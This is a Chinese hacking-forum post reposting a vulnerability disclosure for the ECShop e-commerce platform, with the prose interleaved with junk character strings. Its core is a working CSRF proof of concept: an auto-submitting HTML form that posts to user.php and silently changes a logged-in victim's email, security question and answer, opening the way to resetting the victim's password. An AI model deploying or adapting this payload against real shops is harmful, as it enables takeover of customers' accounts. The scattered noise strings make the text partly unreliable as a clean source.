找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1980|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
# C; h* O# K& d2 M3 ~( lecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现! C% t7 l9 R, `( t# n3 q9 ^3 C
0 E) [  j5 ^' \, l- y( m
Demo For:http://www.wooyun.org/bug.php?action=view&id=3959 c- g8 ~! X/ [+ {

. q- ~$ f! I# V2 ~  h" x8 I$ I详细说明:- B# Q9 T7 p) g' C0 R- t4 ~
利用csrf和xss可以突破官方所说的“障碍”
3 ?% e( \# f, uxss版本已经有人说明/ c7 e, R7 S( L* K( I0 ]8 L
这里给出csrf版本0 Z7 R1 `7 @5 I" g
& M' l4 {6 Y9 L# B: z4 j
漏洞证明:, ]  I6 |7 Z* R1 C+ A
<html>! b4 @) U, @; P" x
<body>
6 A' T+ H! p$ w- b- W9 ]<form action="http://www.wooyun.org/ecshop/user.php" method="POST">1 J1 `9 V+ x1 U1 @
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">; T. A; L" n3 C% ?; N8 B
<INPUT TYPE="text" NAME="act" value="act_edit_profile">1 I( c/ `$ t+ \4 v3 C" T. R+ T  V
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
# P  q( }) Q* _. x: i8 R<INPUT TYPE="text" NAME="passwd_answer" value="exploit"># F5 C. Z( O0 \0 Y- G- k6 p, D( w
</body>
- R  H, r1 ?$ b6 ?9 K' `<script>
& q. f: v0 f, ?7 B+ udocument.forms[0].submit();
2 m3 q, u  V6 E1 E: ^/ S5 k1 [</script>
8 K3 t$ n% u" H2 w4 K9 w</html># y( l+ |. {1 v5 C+ i
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
, j/ H! _( K0 f( R  |; g
4 b' J) f3 Q4 ~5 |% s, F# }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表